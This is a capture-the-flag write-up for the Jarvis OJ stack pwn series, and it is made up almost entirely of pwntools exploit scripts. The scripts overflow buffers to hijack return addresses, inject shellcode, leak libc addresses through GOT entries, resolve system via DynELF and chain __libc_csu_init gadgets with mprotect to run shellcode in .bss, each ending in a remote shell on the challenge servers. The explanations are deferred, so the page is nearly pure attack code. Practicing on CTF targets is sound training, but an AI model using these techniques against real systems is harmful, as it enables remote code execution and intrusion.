Jarvis OJ - Stack Series pwn (partial) - Writeup
I recently worked through some of the pwn challenges on Jarvis OJ and learned a lot. For now I am just recording the exploits here; the analysis and the reasoning behind each one will be added later.
Guestbook
This challenge is similar to level0; refer to the level0 writeup:
http://www.cnblogs.com/WangAoBo/p/7591552.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

elf = ELF('./guestbook')
good_game_addr = elf.symbols['good_game']

# io = process('./guestbook')
io = remote('pwn.jarvisoj.com', 9876)

# 0x88 bytes of padding reach the saved return address, which becomes good_game
payload = 'A' * 0x88 + p64(good_game_addr)
io.recvuntil('message:\n')
io.send(payload)
print io.recvall()
io.close()
Smashes
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
flag_addr = 0x400d21

# offset = 0x7fffffffcd68 - 0x7fffffffcb50
# payload = 'A' * offset + p64(flag_addr)
# Repeat the flag address so that it covers every slot of interest on the stack
payload = p64(flag_addr) * 200

io = remote('pwn.jarvisoj.com', 9877)
# io = process('./smashes')
io.recvuntil('name? ')
io.sendline(payload)
# io.recvuntil('flag: ')
io.recv()
io.sendline()
io.recv()
io.close()
memory
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
elf = ELF('./memory')
win_func_addr = elf.symbols['win_func']
cat_flag_addr = elf.search('cat flag').next()

# Return into win_func; the second copy of win_func serves as its fake return
# address and the 'cat flag' string is passed as its first argument (32-bit cdecl)
payload = 'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

# io = process('./memory')
io = remote('pwn2.jarvisoj.com', 9876)
io.recvuntil('> ')
io.sendline(payload)
print io.recvall()
io.close()
[XMAN]level0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
elf = ELF('./level0')
callsys_addr = elf.symbols['callsystem']

# io = process('./level0')
io = remote('pwn2.jarvisoj.com', 9881)
io.recvuntil('World\n')

# 0x80 bytes of buffer plus the 8-byte saved rbp, then the return address
payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)
io.send(payload)
io.interactive()
io.close()
[XMAN]level1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
shellcode = asm(shellcraft.i386.linux.sh())

# io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)

# The program prints the buffer address; parse it out of the banner line
text = io.recvline()[14: -2]
# print text[14:-2]
buf_addr = int(text, 16)

# Shellcode at the start of the buffer, padding up to the saved return address,
# then the buffer address so execution lands on the shellcode
payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()
[XMAN]level2
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
elf = ELF('./level2')
sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()

# system(), a dummy return address, then the '/bin/sh' argument (32-bit cdecl)
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

# io = process('./level2')
io = remote('pwn2.jarvisoj.com', 9878)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()
[XMAN]level2_x64
level2_x64 and level3_x64 are analyzed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
elf = ELF('./level2_x64')
sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()

# On x64 the first argument goes in rdi, so a "pop rdi; ret" gadget is needed
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]
# print type(p_rdi_r_addr)

payload = 'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

# io = process('./level2_x64')
io = remote('pwn2.jarvisoj.com', 9882)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()
[XMAN]level3
level2_x64 and level3_x64 are analyzed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
local = 0
if local:
    io = process('./level3')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9879)
    libc = ELF('./libc-2.19.so')

elf = ELF('./level3')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = libc.search('/bin/sh').next()

# Stage 1: write(1, read@got, 4) to leak the runtime address of read,
# then return to _start so the program restarts and can be overflowed again
payload = 'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)
io.recvuntil('Input:\n')
io.send(payload)
read_addr = u32(io.recv(4))

# Compute the libc base from the leak and rebase system and '/bin/sh'
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr

# Stage 2: system('/bin/sh')
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()
[XMAN]level3_x64
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'
local = 0
if local:
    io = process('./level3_x64')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9883)
    libc = ELF('./libc-2.19.so')

elf = ELF('./level3_x64')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = libc.search('/bin/sh').next()

# Gadgets for the first two x64 arguments (rdi, rsi); the rsi gadget also pops r15
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]
p_rsi_r15_r_addr = rop.rsi[0]

# Stage 1: write(1, read@got, <rdx as left by the program>) to leak read's address,
# then return to _start to get a second overflow
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)
payload += p64(0x0)
payload += p64(write_elf_addr)
payload += p64(start_elf_addr)
io.recvuntil('Input:\n')
io.send(payload)
read_addr = u64(io.recv(0x8))

# Rebase system and '/bin/sh' on the leaked libc address
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr

# Stage 2: system('/bin/sh')
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(sh_addr)
payload += p64(sys_addr)
payload += p64(0xdeadbeef)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()
[XMAN]level4
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.log_level = 'debug'

# io = process('./level4')
io = remote('pwn2.jarvisoj.com', 9880)

elf = ELF('./level4')
write_elf_addr = elf.symbols['write']
start_elf_addr = elf.symbols['_start']
read_elf_addr = elf.symbols['read']
bss_addr = elf.bss()

def leak(addr):
    # Leak 4 bytes at addr via write(1, addr, 4), then restart from _start
    payload = 'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)
    io.send(payload)
    leaked = io.recv(4)
    log.info("leaked -> %s -> 0x%x" % (leaked, u32(leaked)))
    return leaked

# No libc is provided, so DynELF resolves system from the leak primitive alone
d = DynELF(leak, elf = ELF('./level4'))
sys_addr = d.lookup('system', 'libc')
log.info("sys_addr -> 0x%x" % sys_addr)

# read(0, bss, 8) to place '/bin/sh' in .bss, then restart from _start
payload = 'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)
io.send(payload)
io.send('/bin/sh\0')
sh_addr = bss_addr

# system('/bin/sh')
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.send(payload)
io.interactive()
io.close()
[XMAN]level5
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'M4x'
from pwn import *

context.terminal = ['deepin-terminal', '-x', 'bash', '-c']
context.log_level = 'debug'

def Debug():
    raw_input("waiting for debug:")
    gdb.attach(io, "b *0x0000000000400618")

elf = ELF('./level5')
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]
p_rsi_r15_r_addr = rop.rsi[0]

# __libc_csu_init gadgets: the pop sequence and the mov/call sequence
p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa
mov_call = 0x0000000000400690

local = 0
if local:
    io = process('./level5')
    libc = ELF('./libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9884)
    libc = ELF('./libc-2.19.so')

io.recvuntil('Input:\n')

log.info("Step 1: leak read_addr")
read_libc_addr = libc.symbols['read']
read_got_addr = elf.got['read']
write_elf_addr = elf.symbols['write']
vuln_elf_addr = elf.symbols['vulnerable_function']

# write(1, read@got, ...) then return into vulnerable_function for the next stage
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)
payload += p64(0x0000)
payload += p64(write_elf_addr)
payload += p64(vuln_elf_addr)
io.send(payload)
read_addr = u64(io.recv(8))
io.recvuntil('Input:\n')
log.info("leaked read_addr -> 0x%x" % read_addr)

log.info("Step 2: write shellcode 2 bss")
sh_addr = bss_addr = elf.bss()
shellcode = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"

# csu gadget call: read(0, bss, len(shellcode) + 1) via read@got
payload = 'B' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(len(shellcode) + 1)
payload += p64(bss_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'C' * (7 * 8)
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(shellcode + '\0')
io.recvuntil('Input:\n')

log.info("Step 3: hijack mprotect 2 __gmon_start__")
mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']
mprotect_hijack_addr = 0x0000000000600a70

# csu gadget call: read(0, mprotect_hijack_addr, 8) to store mprotect's address
payload = 'D' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(mprotect_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'E' * (7 * 8)
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(p64(mprotect_addr))
io.recvuntil('Input:\n')

log.info("Step 4: hijack sh/bss 2 __libc_start_main")
sh_hijack_addr = 0x0000000000600a68

# csu gadget call: read(0, sh_hijack_addr, 8) to store the .bss address
payload = 'F' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'G' * (7 * 8)
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(p64(sh_addr))
io.recvuntil('Input:\n')

log.info("Step 5: fix bss 2 777")
# csu gadget call through the stored pointer: mprotect(0x600000, 0x1000, 7)
payload = 'H' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(mprotect_hijack_addr)
payload += p64(0x7)
# payload += p64(len(shellcode) + 1)
# payload += p64(sh_hijack_addr)
payload += p64(0x1000)
payload += p64(0x00600000)
payload += p64(mov_call)
payload += 'I' * (7 * 8)
payload += p64(vuln_elf_addr)
# Debug()
io.send(payload)
io.recvuntil('Input:\n')

log.info("Step 6: execv shellcode")
# csu gadget call through the stored pointer: jump to the shellcode in .bss
payload = 'J' * (0x80 + 0x8)
# payload += p64(sh_addr)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(mov_call)
payload += p64(vuln_elf_addr)
io.send(payload)

log.info("Step 7: getshell")
io.interactive()
io.close()